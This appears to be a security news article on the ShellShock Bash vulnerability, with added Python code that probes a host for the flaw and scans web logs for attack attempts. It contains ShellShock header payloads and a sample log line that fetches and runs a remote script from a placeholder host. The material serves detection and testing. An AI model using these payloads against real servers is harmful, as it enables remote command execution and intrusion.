Only a few months after Heartbleed, another Internet-scale security flaw has come to light, this time in GNU Bash, the default shell on most Linux distributions and on OS X, and one that a huge population of systems runs without ever showing it to the user.
The ShellShock vulnerability (CVE-2014-6271) is a flaw in Bash itself, so it affects any system that ships a vulnerable Bash, including Linux, BSD, OS X and other Unix derivatives. It was discovered by Stephane Chazelas and publicly disclosed on September 24, 2014. The first patch released that day turned out to be incomplete and a follow-up advisory (CVE-2014-7169) was issued within hours, so systems patched early should be re-tested once the later fix is applied.
“This vulnerability is more severe than Heartbleed,” said Lamar Bailey, director of Tripwire’s Vulnerability and Exposure Research Team (VERT). “If an attacker is successful, he or she can take complete control of the target system. Unfortunately, this is one of the rare vulnerabilities with the potential to be a wide-scale worm because it is extremely easy to exploit and there are millions of vulnerable targets.”
Bash is the command interpreter on most Unix and Unix-derived systems, and it is also what many programs run under the hood when they execute a command through /bin/sh on systems where /bin/sh is Bash. The bug lies in how Bash imports function definitions from its environment: a variable whose value begins with `() {` is parsed as a function when a new Bash starts, and vulnerable versions keep executing whatever follows the function's closing brace. Any service that copies attacker-controlled input into the environment of a Bash process, such as a web server exporting HTTP headers to a CGI script, a DHCP client passing server-supplied options to a hook script, or an SSH account restricted with ForceCommand, therefore lets an attacker execute arbitrary commands with that service's privileges. That code can be used to load malware, delete content and steal data. Because the flaw is trivial to trigger over the network, security experts also warn that it is "wormable": self-propagating malware could spread rapidly from system to system without human intervention.
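The mechanism described above can be checked on a host with the test string that circulated when the bug was disclosed. The script below is an added example, not code from the original article or from Tripwire: it wraps that test, and the corresponding test for the follow-up CVE-2014-7169, in a small Python probe that reports whether code smuggled in through the environment was actually executed. The marker string and function names are arbitrary choices.

```python
"""Local (authenticated) ShellShock probe for a Bash binary.

Added example; not code from the original article or from Tripwire.
Runs the widely circulated test strings against a given Bash binary and
reports whether code passed in through the environment was executed.
"""
import os
import shutil
import subprocess
import tempfile

MARKER = "SHELLSHOCK_MARKER"  # arbitrary string that should never appear on its own

# A function definition exported through an environment variable.
# Unpatched Bash imports it when the process starts and, because it keeps
# parsing past the closing brace, runs the trailing `echo` as well.
PROBE_6271 = "() { :;}; echo " + MARKER

# The first CVE-2014-6271 patch left a parser bug (CVE-2014-7169). On an
# affected Bash this definition leaves a dangling redirection, so the
# command `echo date` is turned into `date > echo`, writing the date into
# a file named `echo` in the current directory.
PROBE_7169 = "() { (a)=>\\"


def _run_with_env(bash_path, var, value, command, cwd=None, timeout=5):
    """Run `bash -c command` with one extra environment variable set.
    Returns the CompletedProcess, or None if no Bash binary was found."""
    resolved = shutil.which(bash_path)
    if resolved is None:
        return None
    env = dict(os.environ)
    env[var] = value
    return subprocess.run(
        [resolved, "-c", command], env=env, cwd=cwd,
        capture_output=True, text=True, timeout=timeout,
    )


def probe_cve_2014_6271(bash_path="bash"):
    """True if bash_path executes code after an exported function body,
    False if it is patched, None if no Bash binary was found.
    The command run is harmless; the marker can only show up in stdout
    if Bash executed the tail of the environment variable."""
    proc = _run_with_env(bash_path, "x", PROBE_6271, "echo probe-done")
    if proc is None:
        return None
    return MARKER in proc.stdout


def probe_cve_2014_7169(bash_path="bash"):
    """True if only the incomplete first fix is in place (a file named
    `echo` appears), False if fully patched, None if no Bash was found.
    Runs in a scratch directory so the side effect cannot touch real files."""
    with tempfile.TemporaryDirectory() as scratch:
        proc = _run_with_env(bash_path, "X", PROBE_7169, "echo date", cwd=scratch)
        if proc is None:
            return None
        return os.path.exists(os.path.join(scratch, "echo"))


if __name__ == "__main__":
    labels = {True: "VULNERABLE", False: "not vulnerable", None: "bash not found"}
    for name, probe in (("CVE-2014-6271", probe_cve_2014_6271),
                        ("CVE-2014-7169", probe_cve_2014_7169)):
        print("%s: %s" % (name, labels[probe()]))
```

Pass an explicit path (for example `/bin/bash` versus a vendor-supplied `/opt/.../bash`) when a device carries more than one copy of Bash; patching the package manager's copy says nothing about the others.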
Unix and Unix derivative operating systems are used in a wide variety of consumer and networking products, as well as many other devices found across the enterprise, including:
- Tablets and smartphones
- VOIP equipment
- Badge sensors
- Firewalls, routers and switches
- Printers, 3D printers and scanners
- ‘Smart home’ devices, including HVAC controllers and other connected appliances
- Smart TVs, video projectors and cameras
- Smart meters for energy
- Industrial controllers
- Point of sale devices and handheld barcode scanners
- Wearable devices including Google Glass, smart watches and health monitors.
Since so many kinds of devices may run Bash, and because so many applications expose it indirectly (web servers invoking CGI scripts, daemons that shell out through /bin/sh on systems where /bin/sh is Bash), quickly finding and remediating this critical vulnerability across an estate is a daunting task. Two points help scope the work: many embedded devices run a lighter shell such as BusyBox ash rather than Bash and are not affected by this bug, and a vulnerable Bash is only remotely exploitable where some service passes untrusted input into its environment. Neither can be assumed for a given device, so each one has to be checked.
All Tripwire vulnerability management products, including IP360 and PureCloud, provide authenticated and unauthenticated checks for Bash. Tripwire Enterprise also provides coverage for Bash ShellShock using custom rules and policies.
“Despite Heartbleed, it is rare for a vulnerability to be both as extensive and severe as the Bash bug,” said Tim Erlin, director of IT security and risk strategy for Tripwire.
“This vulnerability has been around for a very long time, making the discovery of all the vulnerable systems on an enterprise network very challenging. Bash itself isn’t directly surfaced on the network, so you need to check potentially vulnerable systems, including many devices that are difficult or impossible to patch.”
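Because Bash is not itself exposed on the network, an unauthenticated check has to go through a service that forwards request data into Bash's environment; CGI is the usual one, and the same pattern is what attackers send. The following is an added example, not part of the original article and not Tripwire's product code: it builds the request headers for such a probe, evaluates the response, and scans combined-format web server log lines for exploitation attempts. The marker string, IP addresses and log lines are constructed for illustration.

```python
"""Network-side ShellShock checks: an unauthenticated CGI probe and
detection of exploitation attempts in web server logs.

Added example; not code from the original article or from Tripwire's
products. The marker, addresses and log lines below are constructed.
"""
import re

MARKER = "SHELLSHOCK_MARKER"  # arbitrary string that should never appear on its own


def build_cgi_probe_headers(marker=MARKER):
    """Headers for an unauthenticated probe of a CGI endpoint.

    A CGI-capable web server copies request headers into the script's
    environment (User-Agent becomes HTTP_USER_AGENT, Referer becomes
    HTTP_REFERER). If the script, or anything it spawns, is Bash, a
    vulnerable Bash runs the trailing command. The two `echo` calls emit
    the blank line that ends the CGI header block, so the marker lands in
    the HTTP body where a scanner can see it instead of being rejected by
    the server as a malformed header.
    """
    payload = "() { :; }; echo; echo; echo %s" % marker
    return {"User-Agent": payload, "Referer": payload}


def cgi_response_is_vulnerable(body, marker=MARKER):
    """True only if the marker was echoed back, i.e. the server-side
    Bash executed code it should never have parsed."""
    return marker in body


# Attackers and scanners both smuggle the function definition through any
# header. Match the tell-tale "() {" with the whitespace variants seen in
# the wild.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx combined log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def find_shellshock_attempts(log_lines):
    """Return (source_ip, field, value) for each log line carrying a
    ShellShock-style payload in the request line, Referer or User-Agent."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("host"), field, m.group(field)))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:22 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :; }; /bin/bash -c \'wget http://198.51.100.7/x -O /tmp/x; sh /tmp/x\'"',
    '198.51.100.23 - - [25/Sep/2014:10:02:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:10:03:45 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 120 '
    '"(){ :;}; echo; echo; id" "curl/7.37.0"',
]

if __name__ == "__main__":
    for host, field, value in find_shellshock_attempts(SAMPLE_LOG):
        print("%s via %s: %s" % (host, field, value))
```

A 200 status in the log does not mean the attempt succeeded; only the body (or the absence of the marker in a probe's body) tells you that, which is why the probe and the log scan are separate checks. Note also that a log hit on a host that does not run CGI at all is still worth recording: it identifies who is scanning you.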